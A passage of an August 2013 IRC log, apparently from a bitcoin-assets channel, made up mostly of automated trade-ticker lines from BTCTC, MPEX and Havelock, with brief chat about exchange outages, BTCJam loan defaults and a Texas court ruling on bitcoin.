[LABCOIN] 746 @ 0.001473 = 1.0989 BTC [+] Aug 07 09:03:29 [BTCTC] [LABCOIN] 2165 @ 0.001475 = 3.1934 BTC [+] Aug 07 09:04:03 [BTCTC] [LABCOIN] 50 @ 0.001474 = 0.0737 BTC [-] Aug 07 09:04:04 [BTCTC] [LABCOIN] 835 @ 0.001475 = 1.2316 BTC [+] Aug 07 09:04:05 [BTCTC] [LABCOIN] 50 @ 0.001487 = 0.0744 BTC [+] Aug 07 09:04:07 [BTCTC] [LABCOIN] 400 @ 0.001488 = 0.5952 BTC [+] Aug 07 09:05:03 [BTCTC] [BTCGARDEN] 8 @ 0.01576 = 0.1261 BTC [+] Aug 07 09:05:04 [BTCTC] [BTCGARDEN] 175 @ 0.01577 = 2.7598 BTC [+] Aug 07 09:05:06 [BTCTC] [BTCGARDEN] 300 @ 0.01578 = 4.734 BTC [+] Aug 07 09:05:07 [BTCTC] [BTCGARDEN] 31 @ 0.01579 = 0.4895 BTC [+] Aug 07 09:05:08 [BTCTC] [BTCGARDEN] 250 @ 0.0158 = 3.95 BTC [+] Aug 07 09:05:09 [BTCTC] [BTCGARDEN] 121 @ 0.01591 = 1.9251 BTC [+] Aug 07 09:05:09 [BTCTC] [BTCGARDEN] 498 @ 0.01592 = 7.9282 BTC [+] Aug 07 09:05:10 [BTCTC] [BTCGARDEN] 9 @ 0.01593 = 0.1434 BTC [+] Aug 07 09:05:11 [BTCTC] [BTCGARDEN] 500 @ 0.01593 = 7.965 BTC [+] Aug 07 09:05:12 [BTCTC] [BTCGARDEN] 25 @ 0.01593 = 0.3983 BTC [+] Aug 07 09:05:13 [BTCTC] [BTCGARDEN] 200 @ 0.01594 = 3.188 BTC [+] Aug 07 09:05:15 [BTCTC] [BTCGARDEN] 4 @ 0.01597 = 0.0639 BTC [+] Aug 07 09:05:16 [BTCTC] [BTCGARDEN] 36 @ 0.01598 = 0.5753 BTC [+] Aug 07 09:05:17 [BTCTC] [BTCGARDEN] 62 @ 0.01599 = 0.9914 BTC [+] Aug 07 09:05:18 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [+] Aug 07 09:05:21 [BTCTC] [ACTIVEMINING] 116 @ 0.005605 = 0.6502 BTC [-] Aug 07 09:05:23 [BTCTC] [ACTIVEMINING] 184 @ 0.0056 = 1.0304 BTC [-] Aug 07 09:09:23 [BTCTC] [DMS.PURCHASE] 2 @ 0.02832 = 0.0566 BTC [+] Aug 07 09:11:19 [BTCTC] [TAT.MINIGAME] 7 @ 0.0002249 = 0.0016 BTC [-] Aug 07 09:11:53 [BTCTC] [ASICMINER-PT] 1 @ 3.8 BTC [+] Aug 07 09:12:05 [BTCTC] [ASICMINER-PT] 1 @ 3.822 BTC [+] Aug 07 09:15:10 [BTCTC] [BTCGARDEN] 281 @ 0.016 = 4.496 BTC [+] **** BEGIN LOGGING AT Wed Aug 7 13:12:01 2013 Aug 07 13:24:09 [MPEX] [S.MPOE] 5600 @ 0.00083232 = 4.661 BTC [+] Aug 07 13:24:52 [BTCTC] [DMS.MINING] 75 @ 0.006599 = 0.4949 BTC [-] Aug 07 13:25:06 [BTCTC] [ACTIVEMINING] 50 @ 0.005866 = 0.2933 BTC [+] Aug 07 13:25:07 [BTCTC] [ACTIVEMINING] 10 @ 0.005867 = 0.0587 BTC [+] Aug 07 13:25:08 [BTCTC] [ACTIVEMINING] 10 @ 0.005878 = 0.0588 BTC [+] Aug 07 13:33:05 [BTCTC] [BTCGARDEN] 25 @ 0.016 = 0.4 BTC [+] Aug 07 13:33:45 [BTCTC] [KENILWORTH] 38 @ 0.001799 = 0.0684 BTC [+] Aug 07 13:37:15 [HAVELOCK] [XBOND] 1 @ 0.0010299 BTC [+] Aug 07 13:39:21 [MPEX] [S.MPOE] 5242 @ 0.00083232 = 4.363 BTC [+] Aug 07 13:39:23 [MPEX] [S.MPOE] 3419 @ 0.00083333 = 2.8492 BTC [+] Aug 07 13:59:13 [BTCTC] [CB.IDIFF-O] 200 @ 0.0085 = 1.7 BTC [-] Aug 07 14:00:07 [BTCTC] [ACTIVEMINING] 50 @ 0.005761 = 0.2881 BTC [-] Aug 07 14:00:08 [BTCTC] [ACTIVEMINING] 68 @ 0.00576 = 0.3917 BTC [-] Aug 07 14:00:10 [BTCTC] [ACTIVEMINING] 50 @ 0.005735 = 0.2868 BTC [-] Aug 07 14:00:11 [BTCTC] [ACTIVEMINING] 40 @ 0.005622 = 0.2249 BTC [-] Aug 07 14:00:12 [BTCTC] [ACTIVEMINING] 152 @ 0.005621 = 0.8544 BTC [-] Aug 07 14:01:24 [BTCTC] [LABCOIN] 200 @ 0.00148 = 0.296 BTC [+] Aug 07 14:01:52 [BTCTC] [LABCOIN] 4 @ 0.001497 = 0.006 BTC [+] Aug 07 14:09:12 [BTCTC] [LABCOIN] 93 @ 0.001499 = 0.1394 BTC [+] Aug 07 14:15:49 [BTCTC] [TAT.MINIGAME] 6 @ 0.00023 = 0.0014 BTC [+] Aug 07 14:17:30 [BTCTC] [ACTIVEMINING] 50 @ 0.005686 = 0.2843 BTC [+] Aug 07 14:17:32 [BTCTC] [ACTIVEMINING] 68 @ 0.005685 = 0.3866 BTC [-] Aug 07 14:17:33 [BTCTC] [ACTIVEMINING] 31 @ 0.005656 = 0.1753 BTC [-] Aug 07 14:18:45 [BTCTC] [ACTIVEMINING] 10 @ 0.005626 = 0.0563 BTC [-] Aug 07 14:18:46 [BTCTC] [ACTIVEMINING] 68 @ 0.005625 = 0.3825 BTC [-] Aug 07 14:18:48 [BTCTC] [DMS.SELLING] 5 @ 0.02299 = 0.115 BTC [+] Aug 07 14:19:29 [BTCTC] [ACTIVEMINING] 48 @ 0.005621 = 0.2698 BTC [-] Aug 07 14:19:30 [BTCTC] [ACTIVEMINING] 100 @ 0.005611 = 0.5611 BTC [-] Aug 07 14:21:55 [BTCTC] [BASIC-MINING] 1 @ 0.3781 BTC [-] Aug 07 14:24:22 [BTCTC] [DMS.MINING] 40 @ 0.006599 = 0.264 BTC [-] Aug 07 14:26:00 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1936 BTC [-] Aug 07 14:30:04 [BTCTC] [BTCGARDEN] 10 @ 0.01595 = 0.1595 BTC [-] Aug 07 14:31:59 [BTCTC] [PAJKA.BOND] 1 @ 0.01942 BTC [-] Aug 07 14:32:13 [BTCTC] [PAJKA.BOND] 1 @ 0.019 BTC [-] Aug 07 14:32:53 [BTCTC] [ACTIVEMINING] 100 @ 0.005594 = 0.5594 BTC [-] Aug 07 14:33:20 [BTCTC] [MININGCO.ETF] 1 @ 1.385 BTC [-] Aug 07 14:34:22 [BTCTC] [ACTIVEMINING] 1 @ 0.005592 BTC [-] Aug 07 14:34:42 bitstamp data feed has been down for a while Aug 07 14:34:50 idiots do not know how to scale Aug 07 14:34:53 oddly noone noticed. Aug 07 14:34:59 but no worries Aug 07 14:35:02 they will fix css Aug 07 14:35:24 [BTCTC] [ACTIVEMINING] 50 @ 0.005591 = 0.2796 BTC [-] Aug 07 14:35:38 is there any exchange that does not suck? :/ Aug 07 14:36:14 i still get suprised by gaystamp idiotism, daily Aug 07 14:36:18 [BTCTC] [TAT.ASICMINER] 2 @ 0.03799 = 0.076 BTC [-] Aug 07 14:37:06 [BTCTC] [TAT.ASICMINER] 4 @ 0.03781 = 0.1512 BTC [-] Aug 07 14:40:19 [BTCTC] [DMS.PURCHASE] 20 @ 0.02832 = 0.5664 BTC [+] Aug 07 14:40:26 pankkake not rly. Aug 07 14:40:30 [BTCTC] [LABCOIN] 7 @ 0.001499 = 0.0105 BTC [+] Aug 07 14:40:31 maybe mjr_ Aug 07 14:40:33 's thing. Aug 07 14:41:45 [BTCTC] [LABCOIN] 100 @ 0.00149 = 0.149 BTC [-] Aug 07 14:42:10 [BTCTC] [LABCOIN] 50 @ 0.001489 = 0.0745 BTC [-] Aug 07 14:42:11 [BTCTC] [LABCOIN] 7 @ 0.00149 = 0.0104 BTC [+] Aug 07 14:42:11 [BTCTC] [LABCOIN] 43 @ 0.001499 = 0.0645 BTC [+] Aug 07 14:43:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.03781 BTC [-] Aug 07 14:46:18 [BTCTC] [LABCOIN] 50 @ 0.001453 = 0.0727 BTC [-] Aug 07 14:46:29 [BTCTC] [LABCOIN] 3 @ 0.001452 = 0.0044 BTC [-] Aug 07 14:47:36 [BTCTC] [LABCOIN] 450 @ 0.00145 = 0.6525 BTC [-] Aug 07 14:47:52 [BTCTC] [LABCOIN] 25 @ 0.001452 = 0.0363 BTC [+] Aug 07 14:47:53 [BTCTC] [TAT.ASICMINER] 5 @ 0.03799 = 0.19 BTC [+] Aug 07 14:48:34 [BTCTC] [LABCOIN] 1 @ 0.001495 BTC [+] Aug 07 14:48:46 [BTCTC] [LABCOIN] 1 @ 0.001453 BTC [-] Aug 07 14:51:06 [BTCTC] [ACTIVEMINING] 213 @ 0.005511 = 1.1738 BTC [-] Aug 07 14:51:41 [BTCTC] [BASIC-MINING] 2 @ 0.3771 = 0.7542 BTC [-] Aug 07 14:51:46 [BTCTC] [LABCOIN] 50 @ 0.001492 = 0.0746 BTC [+] Aug 07 14:52:41 [BTCTC] [BASIC-MINING] 1 @ 0.3771 BTC [-] Aug 07 14:54:14 [BTCTC] [S.MPOE-PT] 1 @ 0.0009986 BTC [+] Aug 07 14:54:34 [BTCTC] [S.MPOE-PT] 1 @ 0.0008602 BTC [-] Aug 07 14:56:17 [BTCTC] [DMS.PURCHASE] 14 @ 0.02832 = 0.3965 BTC [+] Aug 07 14:57:27 [BTCTC] [DMS.SELLING] 28 @ 0.02299 = 0.6437 BTC [+] Aug 07 14:58:07 [BTCTC] [LABCOIN] 1 @ 0.001497 BTC [+] Aug 07 14:58:59 [BTCTC] [LABCOIN] 15 @ 0.001498 = 0.0225 BTC [+] Aug 07 14:59:27 [BTCTC] [DMS.PURCHASE] 23 @ 0.02832 = 0.6514 BTC [+] Aug 07 14:59:56 [BTCTC] [BASIC-MINING] 4 @ 0.3799 = 1.5196 BTC [+] Aug 07 15:00:19 [BTCTC] [ASICMINER-PT] 1 @ 3.84 BTC [-] Aug 07 15:00:19 [BTCTC] [LABCOIN] 99 @ 0.001497 = 0.1482 BTC [-] Aug 07 15:01:23 [BTCTC] [ACTIVEMINING] 50 @ 0.005512 = 0.2756 BTC [+] Aug 07 15:01:29 [BTCTC] [ACTIVEMINING] 149 @ 0.005511 = 0.8211 BTC [-] Aug 07 15:01:31 [BTCTC] [ACTIVEMINING] 553 @ 0.00551 = 3.047 BTC [-] Aug 07 15:05:29 [BTCTC] [ACTIVEMINING] 10 @ 0.005511 = 0.0551 BTC [+] Aug 07 15:05:30 [BTCTC] [ACTIVEMINING] 150 @ 0.00551 = 0.8265 BTC [-] Aug 07 15:05:31 [BTCTC] [ACTIVEMINING] 20 @ 0.0055 = 0.11 BTC [-] Aug 07 15:05:33 [BTCTC] [ACTIVEMINING] 9 @ 0.0055 = 0.0495 BTC [-] Aug 07 15:06:13 [BTCTC] [BTCGARDEN] 63 @ 0.01595 = 1.0049 BTC [-] Aug 07 15:09:03 [BTCTC] [ASICMINER-PT] 1 @ 3.88 BTC [+] Aug 07 15:09:05 [BTCTC] [ACTIVEMINING] 10 @ 0.005501 = 0.055 BTC [+] Aug 07 15:09:07 [BTCTC] [ACTIVEMINING] 91 @ 0.0055 = 0.5005 BTC [-] Aug 07 15:14:10 [BTCTC] [RSM] 15 @ 0.0114 = 0.171 BTC [-] Aug 07 15:14:11 [BTCTC] [RSM] 1 @ 0.01152 BTC [+] Aug 07 15:20:13 is btjam full of scammers? why don't they publish their default rate Aug 07 15:25:35 Oh my god, its full of stars. Aug 07 15:25:38 err i mean scammers. Aug 07 15:26:28 if someone doesnt get the reference http://www.youtube.com/watch?v=oALxLNOhI6I Aug 07 15:29:09 is there any incentive in paying back a bitcoin loan? Aug 07 15:30:02 build reputation and borrow more i guess Aug 07 15:30:47 you can borrow then defect in the end, or create multiple accounts Aug 07 15:31:04 [BTCTC] [LABCOIN] 40 @ 0.00149 = 0.0596 BTC [-] Aug 07 15:31:30 good reputations seem to get their loans funded fast, could be good for asset trading Aug 07 15:31:31 internet anonymity and/or automation won't help making people honest either Aug 07 15:31:56 [BTCTC] [CRYPTO-TRADE] 44 @ 0.1999 = 8.7956 BTC [+] Aug 07 15:31:57 [BTCTC] [CRYPTO-TRADE] 9 @ 0.1999 = 1.7991 BTC [+] Aug 07 15:33:17 i'm just concerned that btcjam doesn't publish the default rate. Aug 07 15:34:22 thats hella shady Aug 07 15:34:24 well yeah, I'm sure there are very legitimate people borrowing like in your examples, but I'm afraid the system is too easy to game Aug 07 15:35:46 [BTCTC] [ASICMINER-PT] 1 @ 3.842 BTC [-] Aug 07 15:35:48 [BTCTC] [ASICMINER-PT] 1 @ 3.84 BTC [-] Aug 07 15:35:49 [BTCTC] [ASICMINER-PT] 1 @ 3.824 BTC [-] Aug 07 15:37:04 i invested in all the less than 2 btc rep builders that had previous paybacks Aug 07 15:40:38 [BTCTC] [BTCGARDEN] 100 @ 0.01567 = 1.567 BTC [-] Aug 07 15:40:40 [BTCTC] [BTCGARDEN] 28 @ 0.01566 = 0.4385 BTC [-] Aug 07 15:40:41 [BTCTC] [BTCGARDEN] 10 @ 0.01565 = 0.1565 BTC [-] Aug 07 15:40:42 [BTCTC] [BTCGARDEN] 362 @ 0.01561 = 5.6508 BTC [-] Aug 07 15:41:46 [BTCTC] [ASICMINER-PT] 1 @ 3.889 BTC [+] Aug 07 15:42:24 [BTCTC] [ASICMINER-PT] 1 @ 3.889 BTC [+] Aug 07 15:42:51 [BTCTC] [ASICMINER-PT] 3 @ 3.89 = 11.67 BTC [+] Aug 07 15:51:51 [BTCTC] [BMF] 10 @ 0.039 = 0.39 BTC [-] Aug 07 15:51:52 [BTCTC] [BMF] 10 @ 0.038 = 0.38 BTC [-] Aug 07 15:51:53 [BTCTC] [BMF] 1 @ 0.03796 BTC [-] Aug 07 15:51:54 [BTCTC] [BMF] 11 @ 0.03795 = 0.4175 BTC [-] Aug 07 15:51:55 [BTCTC] [BMF] 14 @ 0.03441 = 0.4817 BTC [-] Aug 07 15:51:57 [BTCTC] [BMF] 1 @ 0.0344 BTC [-] Aug 07 15:53:48 a texas judge ruled bitcoin to be a currency. how will this effect the price? Aug 07 15:54:37 my guess it that it won't Aug 07 15:54:51 whats a cowboy gonna do Aug 07 15:55:03 unless it has mainstream news coverage and new people flow in of course Aug 07 15:55:22 if you read the wording though, it could mean btct gets raided for illegally offering securities Aug 07 15:56:02 unlicensed exchange Aug 07 15:56:10 the "just for pretend" wording won't fly Aug 07 15:56:38 not sure it ever did Aug 07 15:56:49 it's as ridiculous as the warnings of torrent websites Aug 07 15:57:09 they did hunt down the libertyreserve guy Aug 07 15:58:40 [BTCTC] [ASICMINER-PT] 1 @ 3.831 BTC [-] Aug 07 15:59:28 [BTCTC] [BASIC-MINING] 1 @ 0.3853 BTC [+] Aug 07 16:00:15 [BTCTC] [NASTY-PT] 175 @ 0.0045 = 0.7875 BTC Aug 07 16:00:45 nasty-pt? thats a new one Aug 07 16:01:35 [BTCTC] [ASICMINER-PT] 2 @ 3.831 = 7.662 BTC [-] Aug 07 16:01:36 [BTCTC] [ASICMINER-PT] 3 @ 3.83 = 11.49 BTC [-] Aug 07 16:02:44 [BTCTC] [NASTY-PT] 100 @ 0.0045 = 0.45 BTC Aug 07 16:03:52 [BTCTC] [NASTY-PT] 50 @ 0.0045 = 0.225 BTC Aug 07 16:04:05 [BTCTC] [ACTIVEMINING] 50 @ 0.005539 = 0.277 BTC [+] Aug 07 16:04:35 [BTCTC] [ACTIVEMINING] 7 @ 0.005539 = 0.0388 BTC [+] Aug 07 16:06:55 [BTCTC] [NASTY-PT] 20 @ 0.0045 = 0.09 BTC Aug 07 16:07:41 [BTCTC] [LABCOIN] 50 @ 0.001462 = 0.0731 BTC [-] Aug 07 16:07:42 [BTCTC] [LABCOIN] 150 @ 0.001461 = 0.2192 BTC [-] Aug 07 16:08:28 [BTCTC] [NASTY-PT] 60 @ 0.0045 = 0.27 BTC Aug 07 16:09:27 [BTCTC] [NASTY-PT] 7 @ 0.0045 = 0.0315 BTC Aug 07 16:09:29 [HAVELOCK] [XBOND] 3 @ 0.001027 = 0.0031 BTC [-] Aug 07 16:10:28 [BTCTC] [NASTY-PT] 4 @ 0.0045 = 0.018 BTC Aug 07 16:10:49 [BTCTC] [TAT.MINIGAME] 10 @ 0.0002417 = 0.0024 BTC [+] Aug 07 16:12:37 [BTCTC] [ACTIVEMINING] 50 @ 0.005547 = 0.2774 BTC [+] Aug 07 16:13:13 [BTCTC] [ACTIVEMINING] 50 @ 0.005547 = 0.2774 BTC [+] Aug 07 16:13:14 [BTCTC] [ACTIVEMINING] 21 @ 0.005548 = 0.1165 BTC [+] Aug 07 16:13:15 [BTCTC] [LABCOIN] 50 @ 0.001462 = 0.0731 BTC [+] Aug 07 16:13:17 [BTCTC] [LABCOIN] 800 @ 0.001461 = 1.1688 BTC [-] Aug 07 16:13:56 [BTCTC] [DMS.MINING] 19 @ 0.006279 = 0.1193 BTC [-] Aug 07 16:13:59 [BTCTC] [DMS.MINING] 8 @ 0.006276 = 0.0502 BTC [-] Aug 07 16:14:00 [BTCTC] [DMS.MINING] 4 @ 0.006275 = 0.0251 BTC [-] Aug 07 16:14:02 [BTCTC] [DMS.MINING] 1 @ 0.006275 BTC [-] Aug 07 16:14:03 [BTCTC] [DMS.MINING] 2 @ 0.006275 = 0.0126 BTC [-] Aug 07 16:14:04 [BTCTC] [DMS.MINING] 9 @ 0.006271 = 0.0564 BTC [-] Aug 07 16:18:39 [BTCTC] [NASTY-PT] 50 @ 0.0045 = 0.225 BTC Aug 07 16:18:41 [BTCTC] [ASICMINER-PT] 2 @ 3.84 = 7.68 BTC [+] Aug 07 16:18:43 [BTCTC] [ASICMINER-PT] 1 @ 3.838 BTC [-] Aug 07 16:18:43 [BTCTC] [ASICMINER-PT] 1 @ 3.831 BTC [-] Aug 07 16:18:44 [BTCTC] [ASICMINER-PT] 2 @ 3.83 = 7.66 BTC [-] Aug 07 16:18:46 [BTCTC] [ASICMINER-PT] 2 @ 3.811 = 7.622 BTC [-] Aug 07 16:18:47 [BTCTC] [ASICMINER-PT] 2 @ 3.81 = 7.62 BTC [-] Aug 07 16:20:45 [BTCTC] [NASTY-PT] 34 @ 0.0045 = 0.153 BTC Aug 07 16:20:46 [BTCTC] [NASTY-PT] 500 @ 0.0045 = 2.25 BTC Aug 07 16:20:47 [BTCTC] [NASTY-PT] 175 @ 0.005 = 0.875 BTC [+] Aug 07 16:21:37 [HAVELOCK] [AM100] 2 @ 0.03780001 = 0.0756 BTC [-] Aug 07 16:22:10 [HAVELOCK] [AM100] 3 @ 0.03780001 = 0.1134 BTC [-] Aug 07 16:22:30 [BTCTC] [ACTIVEMINING] 10 @ 0.005547 = 0.0555 BTC [-] Aug 07 16:22:38 [BTCTC] [TAT.ASICMINER] 6 @ 0.03799 = 0.2279 BTC [+] Aug 07 16:23:04 [BTCTC] [NASTY-PT] 10 @ 0.0059 = 0.059 BTC [+] Aug 07 16:23:12 New ASICMINER Poll Questions: https://docs.google.com/forms/d/15Ws1XzJeynK_vsKiQ9NaufQfLZOSKsRfsSgqMLTdIRs Aug 07 16:23:49 [BTCTC] [ASICMINER-PT] 1 @ 3.811 BTC [+] Aug 07 16:23:50 [BTCTC] [ASICMINER-PT] 3 @ 3.81 = 11.43 BTC [-] Aug 07 16:23:52 [BTCTC] [ASICMINER-PT] 3 @ 3.805 = 11.415 BTC [-] Aug 07 16:23:53 [BTCTC] [ASICMINER-PT] 1 @ 3.801 BTC [-] Aug 07 16:23:57 [HAVELOCK] [AM100] 10 @ 0.03771 = 0.3771 BTC [-] Aug 07 16:23:59 [HAVELOCK] [AM100] 24 @ 0.0377 = 0.9048 BTC [-] Aug 07 16:24:02 [HAVELOCK] [AM100] 10 @ 0.0376 = 0.376 BTC [-] Aug 07 16:24:07 I wonder if I can have my nasty shares tendered over to btct Aug 07 16:24:54 [BTCTC] [NASTY-PT] 700 @ 0.00589 = 4.123 BTC [-] Aug 07 16:25:05 contact the issuer of the pt Aug 07 16:25:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.03799 BTC [+] Aug 07 16:25:08 the evolution of bitcoin assets is going the wrong way Aug 07 16:25:12 for the larger part. Aug 07 16:25:45 what do you mean? Aug 07 16:25:56 well Aug 07 16:26:10 for one, we had no fan club listed in #bitcoin-assets a few weeks ago Aug 07 16:26:12 now we have Aug 07 16:26:43 [BTCTC] [ACTIVEMINING] 25 @ 0.005451 = 0.1363 BTC [-] Aug 07 16:26:44 [BTCTC] [ACTIVEMINING] 100 @ 0.00545 = 0.545 BTC [-] Aug 07 16:26:46 [BTCTC] [ACTIVEMINING] 309 @ 0.0054 = 1.6686 BTC [-] Aug 07 16:26:47 [BTCTC] [ACTIVEMINING] 500 @ 0.005387 = 2.6935 BTC [-] Aug 07 16:26:48 [BTCTC] [ACTIVEMINING] 66 @ 0.005385 = 0.3554 BTC [-] Aug 07 16:27:18 [BTCTC] [NASTY-PT] 19 @ 0.029 = 0.551 BTC [+] Aug 07 16:27:50 [BTCTC] [LABCOIN] 300 @ 0.001461 = 0.4383 BTC [-] Aug 07 16:28:01 [BTCTC] [LABCOIN] 50 @ 0.001478 = 0.0739 BTC [+] Aug 07 16:28:03 [BTCTC] [LABCOIN] 6 @ 0.001479 = 0.0089 BTC [+] Aug 07 16:28:04 [BTCTC] [LABCOIN] 93 @ 0.001499 = 0.1394 BTC [+] Aug 07 16:31:08 kakobreklaa> the evolution of bitcoin assets is going the wrong way << certainly the deluge of opinionated noobs is causing some confusion Aug 07 16:31:12 chiefly among themselves. Aug 07 16:32:03 [BTCTC] [NASTY-PT] 1 @ 0.018 BTC [-] Aug 07 16:32:15 [BTCTC] [BTCGARDEN] 28 @ 0.01571 = 0.4399 BTC [+] Aug 07 16:32:16 [BTCTC] [BTCGARDEN] 125 @ 0.0157 = 1.9625 BTC [-] Aug 07 16:32:42 [BTCTC] [ASICMINER-PT] 5 @ 3.8 = 19 BTC [-] Aug 07 16:34:15 [BTCTC] [ACTIVEMINING] 3 @ 0.005508 = 0.0165 BTC [+] Aug 07 16:35:25 [BTCTC] [NASTY-PT] 40 @ 0.006 = 0.24 BTC [-] Aug 07 16:35:47 [BTCTC] [NASTY-PT] 10 @ 0.006 = 0.06 BTC [-] Aug 07 16:36:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.03782 BTC [-] Aug 07 16:37:00 [BTCTC] [ACTIVEMINING] 4 @ 0.005498 = 0.022 BTC [-] Aug 07 16:37:23 [MPEX] [S.MPOE] 6450 @ 0.00083171 = 5.3645 BTC [-] Aug 07 16:37:25 [MPEX] [S.MPOE] 12907 @ 0.00083417 = 10.7666 BTC [+] Aug 07 16:37:34 [MPEX] [S.MPOE] 2843 @ 0.00083515 = 2.3743 BTC [+] Aug 07 16:38:18 [BTCTC] [ASICMINER-PT] 1 @ 3.801 BTC [+] Aug 07 16:38:20 [BTCTC] [ASICMINER-PT] 1 @ 3.8 BTC [-] Aug 07 16:40:15 [BTCTC] [BASIC-MINING] 1 @ 0.3305 BTC [-] Aug 07 16:40:46 [BTCTC] [DMS.SELLING] 18 @ 0.0229 = 0.4122 BTC [-] Aug 07 16:41:00 [BTCTC] [NASTY-PT] 10 @ 0.007 = 0.07 BTC [+] Aug 07 16:41:25 [BTCTC] [TAT.ASICMINER] 11 @ 0.03781 = 0.4159 BTC [-] Aug 07 16:41:27 [BTCTC] [TAT.ASICMINER] 10 @ 0.0378 = 0.378 BTC [-] Aug 07 16:41:29 [BTCTC] [TAT.ASICMINER] 29 @ 0.03711 = 1.0762 BTC [-] Aug 07 16:42:08 [BTCTC] [LABCOIN] 50 @ 0.001464 = 0.0732 BTC [-] Aug 07 16:42:10 [BTCTC] [LABCOIN] 235 @ 0.001463 = 0.3438 BTC [-] Aug 07 16:42:11 [BTCTC] [LABCOIN] 8750 @ 0.001461 = 12.7838 BTC [-] Aug 07 16:42:11 [HAVELOCK] [AM100] 10 @ 0.03752 = 0.3752 BTC [-] Aug 07 16:42:14 [HAVELOCK] [AM100] 67 @ 0.037512 = 2.5133 BTC [-] Aug 07 16:42:16 [HAVELOCK] [AM100] 1 @ 0.037511 BTC [-] Aug 07 16:42:18 [HAVELOCK] [AM100] 11 @ 0.0375 = 0.4125 BTC [-] Aug 07 16:42:20 [HAVELOCK] [AM100] 11 @ 0.0373 = 0.4103 BTC [-] Aug 07 16:42:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.03797 BTC [+] Aug 07 16:42:51 [BTCTC] [ASICMINER-PT] 1 @ 3.797 BTC [-] Aug 07 16:42:52 [BTCTC] [ASICMINER-PT] 3 @ 3.798 = 11.394 BTC [+] Aug 07 16:42:53 [HAVELOCK] [AM1] 1 @ 3.7721 BTC [-] Aug 07 16:42:55 [HAVELOCK] [AM1] 1 @ 3.772 BTC [-] Aug 07 16:42:58 [HAVELOCK] [AM1] 2 @ 3.71 = 7.42 BTC [-] Aug 07 16:42:59 [HAVELOCK] [AM1] 1 @ 3.7 BTC [-] Aug 07 16:43:47 [BTCTC] [LABCOIN] 500 @ 0.00146 = 0.73 BTC [-] Aug 07 16:43:57 [BTCTC] [LABCOIN] 50 @ 0.00146 = 0.073 BTC [-] Aug 07 16:45:13 [HAVELOCK] [AM100] 19 @ 0.0373 = 0.7087 BTC [-] Aug 07 16:45:16 [HAVELOCK] [AM100] 10 @ 0.0372 = 0.372 BTC [-] Aug 07 16:45:18 [HAVELOCK] [AM100] 1 @ 0.0371 BTC [-] Aug 07 16:45:20 [HAVELOCK] [AM100] 10 @ 0.037 = 0.37 BTC [-] Aug 07 16:45:25 [BTCTC] [ASICMINER-PT] 4 @ 3.799 = 15.196 BTC [+] Aug 07 16:46:18 [BTCTC] [TAT.ASICMINER] 4 @ 0.03793 = 0.1517 BTC [-] Aug 07 16:47:46 [BTCTC] [ASICMINER-PT] 2 @ 3.799 = 7.598 BTC [+] Aug 07 16:48:16 [BTCTC] [TAT.ASICMINER] 3 @ 0.03793 = 0.1138 BTC [-] Aug 07 16:48:25 [BTCTC] [TAT.ASICMINER] 20 @ 0.03793 = 0.7586 BTC [-] Aug 07 16:48:27 [BTCTC] [TAT.ASICMINER] 46 @ 0.03711 = 1.7071 BTC [-] Aug 07 16:48:28 [BTCTC] [TAT.ASICMINER] 11 @ 0.0371 = 0.4081 BTC [-] Aug 07 16:49:05 [BTCTC] [DMS.PURCHASE] 24 @ 0.02832 = 0.6797 BTC [+] Aug 07 16:50:50 [BTCTC] [BFMINES] 1 @ 0.003982 BTC [-] Aug 07 16:52:03 [BTCTC] [NASTY-PT] 30 @ 0.006 = 0.18 BTC [-] Aug 07 16:52:24 [BTCTC] [TAT.ASICMINER] 10 @ 0.037 = 0.37 BTC [-] Aug 07 16:52:25 [BTCTC] [TAT.ASICMINER] 40 @ 0.037 = 1.48 BTC [-] Aug 07 16:53:53 [BTCTC] [ASICMINER-PT] 8 @ 3.8 = 30.4 BTC [+] Aug 07 16:54:05 [BTCTC] [NASTY-PT] 10 @ 0.0075 = 0.075 BTC [+] Aug 07 16:54:34 [BTCTC] [ACTIVEMINING] 50 @ 0.005391 = 0.2696 BTC [-] Aug 07 16:54:36 [BTCTC] [ACTIVEMINING] 45 @ 0.00539 = 0.2426 BTC [-] Aug 07 16:54:37 [BTCTC] [ACTIVEMINING] 16 @ 0.005385 = 0.0862 BTC [-] Aug 07 16:54:39 [HAVELOCK] [VTX] 4 @ 0.4541 = 1.8164 BTC [-] Aug 07 16:54:41 [BTCTC] [ACTIVEMINING] 25 @ 0.005384 = 0.1346 BTC [-] Aug 07 16:54:42 [BTCTC] [ACTIVEMINING] 100 @ 0.005383 = 0.5383 BTC [-] Aug 07 16:54:43 [BTCTC] [ACTIVEMINING] 4250 @ 0.005382 = 22.8735 BTC [-] Aug 07 16:54:44 [BTCTC] [ACTIVEMINING] 2 @ 0.005382 = 0.0108 BTC [-] Aug 07 16:54:45 [BTCTC] [ACTIVEMINING] 512 @ 0.00538 = 2.7546 BTC [-] Aug 07 16:54:47 [HAVELOCK] [VTX] 4 @ 0.4513 = 1.8052 BTC [-] Aug 07 16:54:50 [HAVELOCK] [VTX] 1 @ 0.451 BTC [-] Aug 07 16:54:55 [HAVELOCK] [VTX] 1 @ 0.45 BTC [-] Aug 07 16:57:17 [BTCTC] [NASTY-PT] 10 @ 0.007 = 0.07 BTC [-] Aug 07 17:00:32 [BTCTC] [NASTY-PT] 3 @ 0.007 = 0.021 BTC [-] Aug 07 17:00:59 [BTCTC] [LABCOIN] 6 @ 0.001459 = 0.0088 BTC [-] Aug 07 17:01:50 [HAVELOCK] [LABCO] 10 @ 0.00174 = 0.0174 BTC [-] Aug 07 17:03:18 [HAVELOCK] [LABCO] 32 @ 0.00175 = 0.056 BTC [+] Aug 07 17:03:47 [BTCTC] [ASICMINER-PT] 1 @ 3.751 BTC [-] Aug 07 17:03:48 [BTCTC] [ASICMINER-PT] 1 @ 3.75 BTC [-] Aug 07 17:03:50 [BTCTC] [ASICMINER-PT] 1 @ 3.734 BTC [-] Aug 07 17:03:51 [BTCTC] [ASICMINER-PT] 2 @ 3.733 = 7.466 BTC [-] Aug 07 17:08:42 [BTCTC] [ACTIVEMINING] 50 @ 0.005406 = 0.2703 BTC [+] Aug 07 17:08:43 [BTCTC] [ACTIVEMINING] 30 @ 0.005405 = 0.1622 BTC [-] Aug 07 17:08:44 [BTCTC] [ACTIVEMINING] 100 @ 0.0054 = 0.54 BTC [-] Aug 07 17:08:45 [BTCTC] 